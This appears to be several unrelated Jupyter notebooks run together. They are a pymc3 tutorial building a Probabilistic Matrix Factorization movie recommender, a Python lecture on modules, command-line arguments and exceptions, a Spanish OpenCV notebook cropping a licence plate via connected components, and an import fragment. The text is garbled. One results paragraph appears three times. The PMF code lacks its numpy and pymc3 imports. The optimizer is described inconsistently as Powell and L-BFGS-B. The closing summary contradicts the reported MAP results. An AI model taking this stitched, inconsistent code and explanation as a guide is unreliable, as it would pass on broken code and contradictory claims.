[Probabilistic Matrix Factorization (PMF)](http://papers.nips.cc/paper/3208-probabilistic-matrix-factorization.pdf) [3] is a probabilistic approach to the collaborative filtering problem that takes a Bayesian perspective. The ratings $R$ are modeled as draws from a Gaussian distribution. The mean for $R_{ij}$ is $U_i V_j^T$. The precision $\alpha$ is a fixed parameter that reflects the uncertainty of the estimations; the normal distribution is commonly reparameterized in terms of precision, which is the inverse of the variance. Complexity is controlled by placing zero-mean spherical Gaussian priors on $U$ and $V$. In other words, each row of $U$ is drawn from a multivariate Gaussian with mean $\mu = 0$ and precision which is some multiple of the identity matrix $I$. Those multiples are $\alpha_U$ for $U$ and $\alpha_V$ for $V$. So our model is defined by:
$\newcommand\given[1][]{\:#1\vert\:}$
$$
P(R \given U, V, \alpha^2) =
\prod_{i=1}^N \prod_{j=1}^M
\left[ \mathcal{N}(R_{ij} \given U_i V_j^T, \alpha^{-1}) \right]^{I_{ij}}
$$
$$
P(U \given \alpha_U^2) =
\prod_{i=1}^N \mathcal{N}(U_i \given 0, \alpha_U^{-1} \boldsymbol{I})
$$
$$
P(V \given \alpha_U^2) =
\prod_{j=1}^M \mathcal{N}(V_j \given 0, \alpha_V^{-1} \boldsymbol{I})
$$
Given small precision parameters, the priors on $U$ and $V$ ensure our latent variables do not grow too far from 0. This prevents overly strong user preferences and item factor compositions from being learned. This is commonly known as complexity control, where the complexity of the model here is measured by the magnitude of the latent variables. Controlling complexity like this helps prevent overfitting, which allows the model to generalize better for unseen data. We must also choose an appropriate $\alpha$ value for the normal distribution for $R$. So the challenge becomes choosing appropriate values for $\alpha_U$, $\alpha_V$, and $\alpha$. This challenge can be tackled with the soft weight-sharing methods discussed by [Nowland and Hinton, 1992](http://www.cs.toronto.edu/~fritz/absps/sunspots.pdf) [4]. However, for the purposes of this analysis, we will stick to using point estimates obtained from our data.
```
import logging
import time
import scipy as sp
import theano
# Enable on-the-fly graph computations, but ignore
# absence of intermediate test values.
theano.config.compute_test_value = "ignore"
# Set up logging.
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class PMF:
"""Probabilistic Matrix Factorization model using pymc3."""
def __init__(self, train, dim, alpha=2, std=0.01, bounds=(1, 5)):
"""Build the Probabilistic Matrix Factorization model using pymc3.
:param np.ndarray train: The training data to use for learning the model.
:param int dim: Dimensionality of the model; number of latent factors.
:param int alpha: Fixed precision for the likelihood function.
:param float std: Amount of noise to use for model initialization.
:param (tuple of int) bounds: (lower, upper) bound of ratings.
These bounds will simply be used to cap the estimates produced for R.
"""
self.dim = dim
self.alpha = alpha
self.std = np.sqrt(1.0 / alpha)
self.bounds = bounds
self.data = train.copy()
n, m = self.data.shape
# Perform mean value imputation
nan_mask = np.isnan(self.data)
self.data[nan_mask] = self.data[~nan_mask].mean()
# Low precision reflects uncertainty; prevents overfitting.
# Set to the mean variance across users and items.
self.alpha_u = 1 / self.data.var(axis=1).mean()
self.alpha_v = 1 / self.data.var(axis=0).mean()
# Specify the model.
logging.info("building the PMF model")
with pm.Model() as pmf:
U = pm.MvNormal(
"U",
mu=0,
tau=self.alpha_u * np.eye(dim),
shape=(n, dim),
testval=np.random.randn(n, dim) * std,
)
V = pm.MvNormal(
"V",
mu=0,
tau=self.alpha_v * np.eye(dim),
shape=(m, dim),
testval=np.random.randn(m, dim) * std,
)
R = pm.Normal(
"R", mu=(U @ V.T)[~nan_mask], tau=self.alpha, observed=self.data[~nan_mask]
)
logging.info("done building the PMF model")
self.model = pmf
def __str__(self):
return self.name
```
We'll also need functions for calculating the MAP and performing sampling on our PMF model. When the observation noise variance $\alpha$ and the prior variances $\alpha_U$ and $\alpha_V$ are all kept fixed, maximizing the log posterior is equivalent to minimizing the sum-of-squared-errors objective function with quadratic regularization terms.
$$ E = \frac{1}{2} \sum_{i=1}^N \sum_{j=1}^M I_{ij} (R_{ij} - U_i V_j^T)^2 + \frac{\lambda_U}{2} \sum_{i=1}^N \|U\|_{Fro}^2 + \frac{\lambda_V}{2} \sum_{j=1}^M \|V\|_{Fro}^2, $$
where $\lambda_U = \alpha_U / \alpha$, $\lambda_V = \alpha_V / \alpha$, and $\|\cdot\|_{Fro}^2$ denotes the Frobenius norm [3]. Minimizing this objective function gives a local minimum, which is essentially a maximum a posteriori (MAP) estimate. While it is possible to use a fast Stochastic Gradient Descent procedure to find this MAP, we'll be finding it using the utilities built into `pymc3`. In particular, we'll use `find_MAP` with Powell optimization (`scipy.optimize.fmin_powell`). Having found this MAP estimate, we can use it as our starting point for MCMC sampling.
Since it is a reasonably complex model, we expect the MAP estimation to take some time. So let's save it after we've found it. Note that we define a function for finding the MAP below, assuming it will receive a namespace with some variables in it. Then we attach that function to the PMF class, where it will have such a namespace after initialization. The PMF class is defined in pieces this way so I can say a few things between each piece to make it clearer.
```
def _find_map(self):
"""Find mode of posterior using L-BFGS-B optimization."""
tstart = time.time()
with self.model:
logging.info("finding PMF MAP using L-BFGS-B optimization...")
self._map = pm.find_MAP(method="L-BFGS-B")
elapsed = int(time.time() - tstart)
logging.info("found PMF MAP in %d seconds" % elapsed)
return self._map
def _map(self):
try:
return self._map
except:
return self.find_map()
# Update our class with the new MAP infrastructure.
PMF.find_map = _find_map
PMF.map = property(_map)
```
So now our PMF class has a `map` `property` which will either be found using Powell optimization or loaded from a previous optimization. Once we have the MAP, we can use it as a starting point for our MCMC sampler. We'll need a sampling function in order to draw MCMC samples to approximate the posterior distribution of the PMF model.
```
# Draw MCMC samples.
def _draw_samples(self, **kwargs):
kwargs.setdefault("chains", 1)
with self.model:
self.trace = pm.sample(**kwargs)
# Update our class with the sampling infrastructure.
PMF.draw_samples = _draw_samples
```
We could define some kind of default trace property like we did for the MAP, but that would mean using possibly nonsensical values for `nsamples` and `cores`. Better to leave it as a non-optional call to `draw_samples`. Finally, we'll need a function to make predictions using our inferred values for $U$ and $V$. For user $i$ and movie $j$, a prediction is generated by drawing from $\mathcal{N}(U_i V_j^T, \alpha)$. To generate predictions from the sampler, we generate an $R$ matrix for each $U$ and $V$ sampled, then we combine these by averaging over the $K$ samples.
$$
P(R_{ij}^* \given R, \alpha, \alpha_U, \alpha_V) \approx
\frac{1}{K} \sum_{k=1}^K \mathcal{N}(U_i V_j^T, \alpha)
$$
We'll want to inspect the individual $R$ matrices before averaging them for diagnostic purposes. So we'll write code for the averaging piece during evaluation. The function below simply draws an $R$ matrix given a $U$ and $V$ and the fixed $\alpha$ stored in the PMF object.
```
def _predict(self, U, V):
"""Estimate R from the given values of U and V."""
R = np.dot(U, V.T)
n, m = R.shape
sample_R = np.random.normal(R, self.std)
# bound ratings
low, high = self.bounds
sample_R[sample_R < low] = low
sample_R[sample_R > high] = high
return sample_R
PMF.predict = _predict
```
One final thing to note: the dot products in this model are often constrained using a logistic function $g(x) = 1/(1 + exp(-x))$, that bounds the predictions to the range [0, 1]. To facilitate this bounding, the ratings are also mapped to the range [0, 1] using $t(x) = (x + min) / range$. The authors of PMF also introduced a constrained version which performs better on users with less ratings [3]. Both models are generally improvements upon the basic model presented here. However, in the interest of time and space, these will not be implemented here.
## Evaluation
### Metrics
In order to understand how effective our models are, we'll need to be able to evaluate them. We'll be evaluating in terms of root mean squared error (RMSE), which looks like this:
$$
RMSE = \sqrt{ \frac{ \sum_{i=1}^N \sum_{j=1}^M I_{ij} (R_{ij} - R_{ij}^*)^2 }
{ \sum_{i=1}^N \sum_{j=1}^M I_{ij} } }
$$
In this case, the RMSE can be thought of as the standard deviation of our predictions from the actual user preferences.
```
# Define our evaluation function.
def rmse(test_data, predicted):
"""Calculate root mean squared error.
Ignoring missing values in the test data.
"""
I = ~np.isnan(test_data) # indicator for missing values
N = I.sum() # number of non-missing values
sqerror = abs(test_data - predicted) ** 2 # squared error array
mse = sqerror[I].sum() / N # mean squared error
return np.sqrt(mse) # RMSE
```
### Training Data vs. Test Data
The next thing we need to do is split our data into a training set and a test set. Matrix factorization techniques use [transductive learning](http://en.wikipedia.org/wiki/Transduction_%28machine_learning%29) rather than inductive learning. So we produce a test set by taking a random sample of the cells in the full $N \times M$ data matrix. The values selected as test samples are replaced with `nan` values in a copy of the original data matrix to produce the training set. Since we'll be producing random splits, let's also write out the train/test sets generated. This will allow us to replicate our results. We'd like to be able to idenfity which split is which, so we'll take a hash of the indices selected for testing and use that to save the data.
```
# Define a function for splitting train/test data.
def split_train_test(data, percent_test=0.1):
"""Split the data into train/test sets.
:param int percent_test: Percentage of data to use for testing. Default 10.
"""
n, m = data.shape # # users, # movies
N = n * m # # cells in matrix
# Prepare train/test ndarrays.
train = data.copy()
test = np.ones(data.shape) * np.nan
# Draw random sample of training data to use for testing.
tosample = np.where(~np.isnan(train)) # ignore nan values in data
idx_pairs = list(zip(tosample[0], tosample[1])) # tuples of row/col index pairs
test_size = int(len(idx_pairs) * percent_test) # use 10% of data as test set
train_size = len(idx_pairs) - test_size # and remainder for training
indices = np.arange(len(idx_pairs)) # indices of index pairs
sample = np.random.choice(indices, replace=False, size=test_size)
# Transfer random sample from train set to test set.
for idx in sample:
idx_pair = idx_pairs[idx]
test[idx_pair] = train[idx_pair] # transfer to test set
train[idx_pair] = np.nan # remove from train set
# Verify everything worked properly
assert train_size == N - np.isnan(train).sum()
assert test_size == N - np.isnan(test).sum()
# Return train set and test set
return train, test
train, test = split_train_test(dense_data)
```
## Results
```
# Let's see the results:
baselines = {}
for name in baseline_methods:
Method = baseline_methods[name]
method = Method(train)
baselines[name] = method.rmse(test)
print("{} RMSE:\t{:.5f}".format(method, baselines[name]))
```
As expected: the uniform random baseline is the worst by far, the global mean baseline is next best, and the mean of means method is our best baseline. Now let's see how PMF stacks up.
```
# We use a fixed precision for the likelihood.
# This reflects uncertainty in the dot product.
# We choose 2 in the footsteps Salakhutdinov
# Mnihof.
ALPHA = 2
# The dimensionality D; the number of latent factors.
# We can adjust this higher to try to capture more subtle
# characteristics of each movie. However, the higher it is,
# the more expensive our inference procedures will be.
# Specifically, we have D(N + M) latent variables. For our
# Movielens dataset, this means we have D(2625), so for 5
# dimensions, we are sampling 13125 latent variables.
DIM = 10
pmf = PMF(train, DIM, ALPHA, std=0.05)
```
### Predictions Using MAP
```
# Find MAP for PMF.
pmf.find_map();
```
Excellent. The first thing we want to do is make sure the MAP estimate we obtained is reasonable. We can do this by computing RMSE on the predicted ratings obtained from the MAP values of $U$ and $V$. First we define a function for generating the predicted ratings $R$ from $U$ and $V$. We ensure the actual rating bounds are enforced by setting all values below 1 to 1 and all values above 5 to 5. Finally, we compute RMSE for both the training set and the test set. We expect the test RMSE to be higher. The difference between the two gives some idea of how much we have overfit. Some difference is always expected, but a very low RMSE on the training set with a high RMSE on the test set is a definite sign of overfitting.
```
def eval_map(pmf_model, train, test):
U = pmf_model.map["U"]
V = pmf_model.map["V"]
# Make predictions and calculate RMSE on train & test sets.
predictions = pmf_model.predict(U, V)
train_rmse = rmse(train, predictions)
test_rmse = rmse(test, predictions)
overfit = test_rmse - train_rmse
# Print report.
print("PMF MAP training RMSE: %.5f" % train_rmse)
print("PMF MAP testing RMSE: %.5f" % test_rmse)
print("Train/test difference: %.5f" % overfit)
return test_rmse
# Add eval function to PMF class.
PMF.eval_map = eval_map
# Evaluate PMF MAP estimates.
pmf_map_rmse = pmf.eval_map(train, test)
pmf_improvement = baselines["mom"] - pmf_map_rmse
print("PMF MAP Improvement: %.5f" % pmf_improvement)
```
We actually see a decrease in performance between the MAP estimate and the mean of means performance. We also have a fairly large difference in the RMSE values between the train and the test sets. This indicates that the point estimates for $\alpha_U$ and $\alpha_V$ that we calculated from our data are not doing a great job of controlling model complexity.
Let's see if we can improve our estimates by approximating our posterior distribution with MCMC sampling. We'll draw 500 samples, with 500 tuning samples.
### Predictions using MCMC
```
# Draw MCMC samples.
pmf.draw_samples(
draws=500,
tune=500,
)
```
### Diagnostics and Posterior Predictive Check
The next step is to check how many samples we should discard as burn-in. Normally, we'd do this using a traceplot to get some idea of where the sampled variables start to converge. In this case, we have high-dimensional samples, so we need to find a way to approximate them. One way was proposed by [Salakhutdinov and Mnih, p.886](https://www.cs.toronto.edu/~amnih/papers/bpmf.pdf). We can calculate the Frobenius norms of $U$ and $V$ at each step and monitor those for convergence. This essentially gives us some idea when the average magnitude of the latent variables is stabilizing. The equations for the Frobenius norms of $U$ and $V$ are shown below. We will use `numpy`'s `linalg` package to calculate these.
$$ \|U\|_{Fro}^2 = \sqrt{\sum_{i=1}^N \sum_{d=1}^D |U_{id}|^2}, \hspace{40pt} \|V\|_{Fro}^2 = \sqrt{\sum_{j=1}^M \sum_{d=1}^D |V_{jd}|^2} $$
```
def _norms(pmf_model, monitor=("U", "V"), ord="fro"):
"""Return norms of latent variables at each step in the
sample trace. These can be used to monitor convergence
of the sampler.
"""
monitor = ("U", "V")
norms = {var: [] for var in monitor}
for sample in pmf_model.trace:
for var in monitor:
norms[var].append(np.linalg.norm(sample[var], ord))
return norms
def _traceplot(pmf_model):
"""Plot Frobenius norms of U and V as a function of sample #."""
trace_norms = pmf_model.norms()
u_series = pd.Series(trace_norms["U"])
v_series = pd.Series(trace_norms["V"])
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 7))
u_series.plot(kind="line", ax=ax1, grid=False, title=r"$\|U\|_{Fro}^2$ at Each Sample")
v_series.plot(kind="line", ax=ax2, grid=False, title=r"$\|V\|_{Fro}^2$ at Each Sample")
ax1.set_xlabel("Sample Number")
ax2.set_xlabel("Sample Number")
PMF.norms = _norms
PMF.traceplot = _traceplot
pmf.traceplot()
```
It appears we get convergence of $U$ and $V$ after about the default tuning. When testing for convergence, we also want to see convergence of the particular statistics we are looking for, since different characteristics of the posterior may converge at different rates. Let's also do a traceplot of the RSME. We'll compute RMSE for both the train and the test set, even though the convergence is indicated by RMSE on the training set alone. In addition, let's compute a running RMSE on the train/test sets to see how aggregate performance improves or decreases as we continue to sample.
Notice here that we are sampling from 1 chain only, which makes the convergence statisitcs like $\hat{r}$ impossible (we can still compute the split-rhat but the purpose is different). The reason of not sampling multiple chain is that PMF might not have unique solution. Thus without constraints, the solutions are at best symmetrical, at worse identical under any rotation, in any case subject to label switching. In fact if we sample from multiple chains we will see large $\hat{r}$ indicating the sampler is exploring different solutions in different part of parameter space.
```
def _running_rmse(pmf_model, test_data, train_data, burn_in=0, plot=True):
"""Calculate RMSE for each step of the trace to monitor convergence."""
burn_in = burn_in if len(pmf_model.trace) >= burn_in else 0
results = {"per-step-train": [], "running-train": [], "per-step-test": [], "running-test": []}
R = np.zeros(test_data.shape)
for cnt, sample in enumerate(pmf_model.trace[burn_in:]):
sample_R = pmf_model.predict(sample["U"], sample["V"])
R += sample_R
running_R = R / (cnt + 1)
results["per-step-train"].append(rmse(train_data, sample_R))
results["running-train"].append(rmse(train_data, running_R))
results["per-step-test"].append(rmse(test_data, sample_R))
results["running-test"].append(rmse(test_data, running_R))
results = pd.DataFrame(results)
if plot:
results.plot(
kind="line",
grid=False,
figsize=(15, 7),
title="Per-step and Running RMSE From Posterior Predictive",
)
# Return the final predictions, and the RMSE calculations
return running_R, results
PMF.running_rmse = _running_rmse
predicted, results = pmf.running_rmse(test, train)
# And our final RMSE?
final_test_rmse = results["running-test"].values[-1]
final_train_rmse = results["running-train"].values[-1]
print("Posterior predictive train RMSE: %.5f" % final_train_rmse)
print("Posterior predictive test RMSE: %.5f" % final_test_rmse)
print("Train/test difference: %.5f" % (final_test_rmse - final_train_rmse))
print("Improvement from MAP: %.5f" % (pmf_map_rmse - final_test_rmse))
print("Improvement from Mean of Means: %.5f" % (baselines["mom"] - final_test_rmse))
```
We have some interesting results here. As expected, our MCMC sampler provides lower error on the training set. However, it seems it does so at the cost of overfitting the data. This results in a decrease in test RMSE as compared to the MAP, even though it is still much better than our best baseline. So why might this be the case? Recall that we used point estimates for our precision paremeters $\alpha_U$ and $\alpha_V$ and we chose a fixed precision $\alpha$. It is quite likely that by doing this, we constrained our posterior in a way that biased it towards the training data. In reality, the variance in the user ratings and the movie ratings is unlikely to be equal to the means of sample variances we used. Also, the most reasonable observation precision $\alpha$ is likely different as well.
We have some interesting results here. As expected, our MCMC sampler provides lower error on the training set. However, it seems it does so at the cost of overfitting the data. This results in a decrease in test RMSE as compared to the MAP, even though it is still much better than our best baseline. So why might this be the case? Recall that we used point estimates for our precision paremeters $\alpha_U$ and $\alpha_V$ and we chose a fixed precision $\alpha$. It is quite likely that by doing this, we constrained our posterior in a way that biased it towards the training data. In reality, the variance in the user ratings and the movie ratings is unlikely to be equal to the means of sample variances we used. Also, the most reasonable observation precision $\alpha$ is likely different as well.
We have some interesting results here. As expected, our MCMC sampler provides lower error on the training set. However, it seems it does so at the cost of overfitting the data. This results in a decrease in test RMSE as compared to the MAP, even though it is still much better than our best baseline. So why might this be the case? Recall that we used point estimates for our precision paremeters $\alpha_U$ and $\alpha_V$ and we chose a fixed precision $\alpha$. It is quite likely that by doing this, we constrained our posterior in a way that biased it towards the training data. In reality, the variance in the user ratings and the movie ratings is unlikely to be equal to the means of sample variances we used. Also, the most reasonable observation precision $\alpha$ is likely different as well.
### Summary of Results
Let's summarize our results.
```
size = 100 # RMSE doesn't really change after 100th sample anyway.
all_results = pd.DataFrame(
{
"uniform random": np.repeat(baselines["ur"], size),
"global means": np.repeat(baselines["gm"], size),
"mean of means": np.repeat(baselines["mom"], size),
"PMF MAP": np.repeat(pmf_map_rmse, size),
"PMF MCMC": results["running-test"][:size],
}
)
fig, ax = plt.subplots(figsize=(10, 5))
all_results.plot(kind="line", grid=False, ax=ax, title="RMSE for all methods")
ax.set_xlabel("Number of Samples")
ax.set_ylabel("RMSE");
```
## Summary
We set out to predict user preferences for unseen movies. First we discussed the intuitive notion behind the user-user and item-item neighborhood approaches to collaborative filtering. Then we formalized our intuitions. With a firm understanding of our problem context, we moved on to exploring our subset of the Movielens data. After discovering some general patterns, we defined three baseline methods: uniform random, global mean, and mean of means. With the goal of besting our baseline methods, we implemented the basic version of Probabilistic Matrix Factorization (PMF) using `pymc3`.
Our results demonstrate that the mean of means method is our best baseline on our prediction task. As expected, we are able to obtain a significant decrease in RMSE using the PMF MAP estimate obtained via Powell optimization. We illustrated one way to monitor convergence of an MCMC sampler with a high-dimensionality sampling space using the Frobenius norms of the sampled variables. The traceplots using this method seem to indicate that our sampler converged to the posterior. Results using this posterior showed that attempting to improve the MAP estimation using MCMC sampling actually overfit the training data and increased test RMSE. This was likely caused by the constraining of the posterior via fixed precision parameters $\alpha$, $\alpha_U$, and $\alpha_V$.
As a followup to this analysis, it would be interesting to also implement the logistic and constrained versions of PMF. We expect both models to outperform the basic PMF model. We could also implement the [fully Bayesian version of PMF](https://www.cs.toronto.edu/~amnih/papers/bpmf.pdf) (BPMF), which places hyperpriors on the model parameters to automatically learn ideal mean and precision parameters for $U$ and $V$. This would likely resolve the issue we faced in this analysis. We would expect BPMF to improve upon the MAP estimation produced here by learning more suitable hyperparameters and parameters. For a basic (but working!) implementation of BPMF in `pymc3`, see [this gist](https://gist.github.com/macks22/00a17b1d374dfc267a9a).
If you made it this far, then congratulations! You now have some idea of how to build a basic recommender system. These same ideas and methods can be used on many different recommendation tasks. Items can be movies, products, advertisements, courses, or even other people. Any time you can build yourself a user-item matrix with user preferences in the cells, you can use these types of collaborative filtering algorithms to predict the missing values. If you want to learn more about recommender systems, the first reference is a good place to start.
## References
1. Y. Koren, R. Bell, and C. Volinsky, “Matrix Factorization Techniques for Recommender Systems,” Computer, vol. 42, no. 8, pp. 30–37, Aug. 2009.
2. K. Goldberg, T. Roeder, D. Gupta, and C. Perkins, “Eigentaste: A constant time collaborative filtering algorithm,” Information Retrieval, vol. 4, no. 2, pp. 133–151, 2001.
3. A. Mnih and R. Salakhutdinov, “Probabilistic matrix factorization,” in Advances in neural information processing systems, 2007, pp. 1257–1264.
4. S. J. Nowlan and G. E. Hinton, “Simplifying Neural Networks by Soft Weight-sharing,” Neural Comput., vol. 4, no. 4, pp. 473–493, Jul. 1992.
5. R. Salakhutdinov and A. Mnih, “Bayesian Probabilistic Matrix Factorization Using Markov Chain Monte Carlo,” in Proceedings of the 25th International Conference on Machine Learning, New York, NY, USA, 2008, pp. 880–887.
The model discussed in this analysis was developed by Ruslan Salakhutdinov and Andriy Mnih. Code and supporting text are the original work of [Mack Sweeney](https://www.linkedin.com/in/macksweeney) with changes made to adapt the code and text for the Movielens dataset by Colin Carroll and Rob Zinkov.
```
%load_ext watermark
%watermark -n -u -v -iv -w
```
|
github_jupyter
|
# Making your own modules
If a function will be used in multiple programs, it should be written
as a module instead.
All one has to do is put the functions in a program_name.py
file and import it (the whole thing) or the functions, then
use them in the main program.
Exactly the same way how you import and use other libraries.
## Example
Given mass and velocity, this function calculates the kinetic energy of a particle
in meters/kilograms/seconds (mks) units.
$$E_k = \frac{1}{2} \cdot mv^2$$
```
def eKinetic(mass, velocity):
return 0.5 * mass * velocity**2
eKinetic(1, 10)
```
#### Q. What will the output be?
The following function calculates the x, y, and z accelerations
of a particle resulting from forces acting upon it given its mass.
All units are SI.
$a=\frac{F}{m}$ rearranged from $F=ma$
> Note: These techniques are also related to some of the tasks in the homework and the final project.
```
def acceleration(xForce, yForce, zForce, mass):
xAccel = float(xForce) / float(mass)
yAccel = float(yForce) / float(mass)
zAccel = float(zForce) / float(mass)
return (xAccel, yAccel, zAccel)
```
#### Q. What will this do?
```
acceleration(10, 20, 30, 5)
```
```
# remember that this line overwrites the local definition
# because it has the same name as above!
from kinematics import eKinetic, acceleration
mass = 100
velocity = 10
xForce = 10
yForce = 20
zForce = 30
kEnergy = eKinetic(mass, velocity)
mAccel = acceleration(xForce, yForce, zForce, mass)
kEnergy, mAccel
```
### Providing program arguments on the command-line
Input is often supplied to Python scripts via the command line.
Put another way, "arguments" are provided to scripts.
Here are some Linux examples:
```bash
echo $PATH
```
echo is the command, `$PATH` is an argument. Or,
```bash
cd some_directory
```
cd is the commmand, `some_directory` is an argument.
```bash
cd
```
No arguments here -- default behavior: cd $HOME
We can do the same sort of thing in Python using the sys module.
The following script (lecture_08_wavetofreq.py) converts a
user-supplied wavelength (in Angstroms) to frequency (in Hz).
I show you here how to quickly load an existing script into the notebook, using %load:
```
# %load lecture_08_wavetofreq.py
#!/usr/bin/env python
import sys
wave = float(sys.argv[1])
freq = 3.0e8 / (wave / 1e10)
print('frequency (Hz) = %e' % freq)
import sys # "sys" is short for "system"
wave = float(sys.argv[1])
freq = 3.0e8 / (wave / 1e10) # pass wavelength in Angstroms
print('frequency (Hz) = %e' % freq)
sys.argv
```
sys.argv contains a list of the command line arguments to the program.
sys.argv[0] is always the name of the program.
To run it in a Linux terminal (must be in same directory as file):
```bash
python lecture_08_wavetofreq.py 5000
```
To run it within here or a simple ipython terminal (file must be in same directory that you
launched the notebook from):
```
%run lecture_08_wavetofreq.py 5000
```
#### Q. What if there is more than one command-line input required?
```
import sys
for i, element in enumerate(sys.argv):
print("Argument #{} = {}".format(i, element))
```
#### Q. What will the following command do in a Linux session?
You will practice with sys in the tutorial!
```
%run lecture_08_systest.py 'hello' 2 4 6
```
### Error Handling
The script lecture_08_wavetofreq.py expects an argument, the
wavelength in Angstroms:
```
# lecture_08_wavetofreq.py
import sys
wave = float(sys.argv[1]) # Attempting to use the argument here.
freq = 3.0e8 / (wave / 1e10) # Convert wavelength in Angstroms to frequency in Hz
print('frequency (Hz) = %e' % freq)
```
If we forget to supply that argument, we get an error message:
```
%run lecture_08_wavetofreq.py
```
It tells us what file and what line where the error occured and
the type of error (IndexError)
#### Q. What is a simple way we could tell if the user forgot the argument and exit the program gracefully without a crash?
```
# lecture_08_wavetofreq2.py
import sys
if len(sys.argv) < 2:
print('Enter the wavelength in Angstroms on the command line.')
sys.exit(1) # Exits and 1 indicates failure
# sys.exit() or sys.exit(0) is used to indicate success
wave = float(sys.argv[1])
freq = 3.0e8 / (wave / 1e10)
print('frequency (Hz) = %e' % freq )
```
#### Q. What will the following yield?
```
%run lecture_08_wavetofreq2.py 5000
```
#### Q. And this?
```
%run lecture_08_wavetofreq2.py
%tb
```
### Exception Handling
Alternatively, the program can try to run the code and
if errors are found, jump to statements that handle
the error as desired.
This is done with two new reserved words, "try" and "except",
which are used in a similar way as "if" and "elif".
This is the script lecture_08_wavetofreq3.py:
```
# lecture_08_wavetofreq3.py
import sys
try:
wave = float(sys.argv[1])
except:
print('Enter the wavelength in Angstroms on the command line.')
sys.exit(1)
freq = 3.0e8 / (wave / 1e10)
print('frequency (Hz) = %e' % freq)
```
If the command in the try block produces an error, the except block
is executed.
#### Q. What does "wave = float(sys.argv[1])" attempt to do?
#### Q. What if we try to do the following:
```
%run lecture_08_wavetofreq3.py x
%tb
```
> The program could also fail if something other than a number is given
on the command line!
That produces a ValueError, not an IndexError.
We can fix this with two separate exceptions appropriate for the two
possible errors (this is similar to if/elif/elif):
```
# lecture_08_wavetofreq4.py
import sys
try:
wave = float(sys.argv[1])
except IndexError:
print('Enter the wavelength in Angstroms on the command line.')
sys.exit(1)
except ValueError as error:
#print 'The wavelength must be a number'\
#' not %s.' % type(sys.argv[1])
print("The error is:", error)
sys.exit(2)
freq = 3.0e8 / (wave / 1e10)
print('frequency (Hz) = %e' % freq)
```
#### Q. What do these yield?
```
%run lecture_08_wavetofreq4.py 5000
%run lecture_08_wavetofreq4.py
%run lecture_08_wavetofreq4.py x
```
### Common error types
```
data = range(9)
data[9]
```
```
y = float('x')
y = float('3')
y
```
```
x
```
```
4.0/0
```
```
iff 2 > 1:
print('it is.')
```
```
10.0 * 'blah'
```
#### Q. But what will this do?
```
5 * 'blah '
```
Nice flowchart on error handling (http://i.imgur.com/WRuJV6r.png):

|
github_jupyter
|
<a href="https://colab.research.google.com/github/josearangos/PDI/blob/Colab/Colab_Class/binarySegmentation.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
import cv2
import numpy as np
import matplotlib.pyplot as plt
from google.colab.patches import cv2_imshow
```
## Segmentación binaria
### Actividad
En esta clase se analiza una imagen binarizada de un carro(entrada) en donde se resalta la placa y se busca sacar solo la placa
```
! wget https://github.com/josearangos/PDI/raw/Colab/Resources/Image/placa_bina.png
! wget https://github.com/josearangos/PDI/raw/Colab/Resources/Image/carro_shape.jpg
```
## Leemos la imagen
```
a = cv2.imread('placa_bina.png',0) #Leemos nuestra imagen de dos dimensiones
b = a.copy() #Creamos una copia
fil,col = b.shape #Guardamos sus dimensiones en variables separadas
cv2_imshow(b)
```
## Aplicamos la mascara
```
a = cv2.threshold(a,127,255,cv2.THRESH_BINARY)[1] #Convertimos nuestra imagen para hacerla de una sola dimensión para poder aplicar la función de conectividad con la cual etiquetaremos las secciones que están interconectadas
ret, labels = cv2.connectedComponents(a,4) #Guardamos el número de etiquetas y una matriz que contiene el valor de cada pixel (La etiqueta que le corresponde)
#MAP COMPONENTS TO HUE VAL (formula to hsv) Con esta formula tomamos la matriz de etiquetas resultantes y creamos una imagen con pseudo colores de nuestra imagen original pero con los pixeles que comparten etiqueta del mismo color
label_hue = np.uint8(179*labels/np.max(labels))
blank_ch = 255*np.ones_like(label_hue)
labeled_a = cv2.merge([label_hue, blank_ch, blank_ch])
#cvt to bgr for display
labeled_a = cv2.cvtColor(labeled_a, cv2.COLOR_HSV2BGR)
#Convert background to black
labeled_a[label_hue==0] = 255 #Convertimos en cero los pixeles que en la matriz de etiquetas son cero
cv2_imshow(labeled_a)
```
## Graficamos la distribución de pixeles
```
#Con las dos líneas de código anteriores hacemos cero los valores no etiquetados para mostrarlos en negro
total = [] #Creamos un arreglo para guardar el numero de pixeles que comparten cada etiqueta por etiqueta
valor = 0 #Variable que almacenará el número de pixeles que comparten una etiqueta
#Con las dos líneas de código anteriores hacemos cero los valores no etiquetados para mostrarlos en negro
for i in range (1,ret): #Con este ciclo for guardamos el número de pixeles que tiene cada etiqueta y lo guardamos en una lista
valor = i
c = b*0
c[labels == i] = 1
suma = np.sum(c)
total = [(valor,suma)] + total
x_list = [l[0] for l in total] #Extraemos de la lista el valor de cada etiqueta
y_list = [l[1] for l in total] #Extraemos el valor de la suma de cada etiqueta
y_list = np.uint32(y_list) #Convertimos los valores obtenidos en la suma de pixeles de la etiqueta a 32 bits
plt.scatter(x_list,y_list) # Graficamos los calor x = etiquetas y = valor suma pixeles etiquera
plt.show() #Mostramos la gráfica
d = cv2.imread('carro_shape.jpg',1) #Leemos la imagen que extraímos en formato s de hsv
mx = np.max(total) #Buscamos la etiqueta que tienen el mayor número de pixeles interconectados
ind = []
ind = np.where(mx==total) # Guardamos en un arreglo cada pixel que tenga el valor de mx
c = b*0 # Creamos una matriz vacia del tamaño de b (La imagen que tenemos de carro en 3 capas)
c[labels == 262] = 255 #Cada pixel que tenga el valor de la etiqueta con más pixeles que la conforman lo hacemos 255 (negro)
cv2_imshow(c) #Mostramos la imagen obtenida en la linea de código anterior
x,y = np.where(c>0) #Guardamos las coordenadas de cada pixel en negro (255) de C
fm = np.min(x) #Guardamos su valor mínimo en x
fx = np.max(x) #Guardamos su valor máximo en x
cm = np.min(y) #Guardamos su valor mínimo en y
cx = np.max(y) #Guardamos su valor máximo en y
d = d[fm:fx,cm:cx,:] #Tomamos de la imagen origianl el area encerrada por los valores obtenido en las cuatro líneas de código anterior
```
## Resultado placa
```
cv2_imshow(d) #Mostramos la imagen obtenida
```
|
github_jupyter
|
```
import torch
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn import svm
from xgboost import XGBClassifier
from sklearn.metrics import recall_score
from joblib import dump, load
from sklearn.metrics import roc_curve, auc
import matplotlib.pyplot as plt
from sklearn.externals import joblib
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(torch.cuda.is_available())
new_file = 'newnew.xlsx'
